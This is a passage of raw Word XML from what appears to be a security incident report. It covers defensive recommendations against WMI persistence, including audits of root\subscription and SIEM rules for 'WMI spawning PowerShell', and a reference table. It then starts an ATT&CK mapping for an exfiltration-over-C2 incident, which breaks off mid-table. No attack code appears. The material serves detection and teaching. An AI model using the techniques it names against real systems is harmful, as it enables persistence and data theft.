          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Least privilege enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="2E9759DD" w14:textId="560C2D03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Reduce local admin exposure; creation of WMI persistence is easier with elevated privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="19873590" w:rsidRDefault="00B8236E" w14:paraId="1219513F" w14:textId="2CD8C5BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="6CC90980" w14:textId="30123CBB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Monitoring + periodic audits</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="635CF49E" w14:textId="0C48E689">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Regular audit of root\subscription for unknown filters/consumers/bindings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="6BB59A48" w:rsidRDefault="6BB59A48" w14:paraId="3EDD05D7" w14:textId="12B0F16B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>SIEM correlation rules for “WMI spawning PowerShell” patterns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="4035D36F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896704" w:id="53"/>
      <w:commentRangeStart w:id="54"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:commentRangeEnd w:id="54"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="54"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3823"/>
        <w:gridCol w:w="5359"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidTr="001B4A08" w14:paraId="6B48E080" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="6BFD2A5B" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Description of Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="6A4EC783" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidTr="001B4A08" w14:paraId="7A0BD20D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="4E22224B" w14:paraId="65D98EA0" w14:textId="6C9DEB6D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK: Event Triggered Execution – Windows Management Instrumentation (T1546.003)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="4E22224B" w14:paraId="66418157" w14:textId="4684301D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId55">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://attack.mitre.org/techniques/T1546/003/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00B8236E" w:rsidTr="001B4A08" w14:paraId="63C78D58" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="29E5D3DD" w14:paraId="328628B2" w14:textId="50C18DBD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows Event Log Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidRPr="00D01BC9" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="6BF21DC8" w14:paraId="5FD404C3" w14:textId="235C1A38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId56">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://wazuh.com/platform/overview/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2226C775" w:rsidTr="2226C775" w14:paraId="42EA3F4B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="2226C775" w:rsidP="2226C775" w:rsidRDefault="65BDD4F0" w14:paraId="2FB8109A" w14:textId="3F0B93ED">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Background on WMI namespaces and execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="2226C775" w:rsidP="2226C775" w:rsidRDefault="2192430B" w14:paraId="59B4B3DE" w14:textId="30DFC692">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId57">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="4D7FE1C7" w:rsidTr="4D7FE1C7" w14:paraId="6BC53695" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="4D7FE1C7" w:rsidP="4D7FE1C7" w:rsidRDefault="64F4EB37" w14:paraId="14C6AEA3" w14:textId="645B941E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Official Sysmon reference for detecting WMI persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="4D7FE1C7" w:rsidP="4D7FE1C7" w:rsidRDefault="2C653FAE" w14:paraId="47196DC6" w14:textId="1D6997A1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId58">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="03ED2ED0" w:rsidTr="03ED2ED0" w14:paraId="39DA2740" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="03ED2ED0" w:rsidP="03ED2ED0" w:rsidRDefault="70C448EA" w14:paraId="543CE3D5" w14:textId="1D09D573">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Red Canary – WMI Persistence Explained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5359" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="03ED2ED0" w:rsidP="03ED2ED0" w:rsidRDefault="03ED2ED0" w14:paraId="49A549C1" w14:textId="72F75F8C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId59">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                </w:rPr>
                <w:t>https://redcanary.com/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="7986675F" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="343891C3" w14:textId="77777777">
      <w:pPr>
        <w:widowControl/>
        <w:overflowPunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:adjustRightInd/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="793CAF31" w14:textId="25F3A0A9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896705" w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Incident #004 – Exfiltration Over C2 Channel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w:rsidRPr="003419C9" w:rsidR="00B8236E" w:rsidP="00B8236E" w:rsidRDefault="00B8236E" w14:paraId="2819E456" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896706" w:id="56"/>
      <w:commentRangeStart w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:commentRangeEnd w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="57"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1472"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1499"/>
        <w:gridCol w:w="1502"/>
        <w:gridCol w:w="1498"/>
        <w:gridCol w:w="1712"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B8236E" w:rsidTr="2BFA4357" w14:paraId="7B6DB54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rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="045982B3" w14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="78F7BD21"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Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="531F8C5B"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Technique Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="7C585227"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Sub-technique Name (if applicable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1498" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="63548CDD"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Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="3DACED4D"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color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Permissions Required to perform attack (User/Admin/NIL)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00B8236E" w14:paraId="2E1875D8"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bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="12"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13605" w:rsidTr="2BFA4357" w14:paraId="4F5148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2" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="000F10DF" w14:paraId="3ACFA45B" w14:textId="2ACB3FF0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00094DDF" w14:paraId="4AE108CE" w14:textId="054A4599">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00E13605" w14:paraId="361BA732" w14:textId="03E35C12">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="00E13605" w14:paraId="5DE9F344" w14:textId="46D6A280">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1498" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="009F3FA8" w:rsidR="00B8236E" w:rsidP="001B4A08" w:rsidRDefault="007F6AF1" w14:paraId="73266A31" w14:textId="23E45D33">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C05F84" w:rsidP="001B4A08" w:rsidRDefault="2BFA4357" w14:paraId="27E6F034" w14:textId="0BE2B538">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
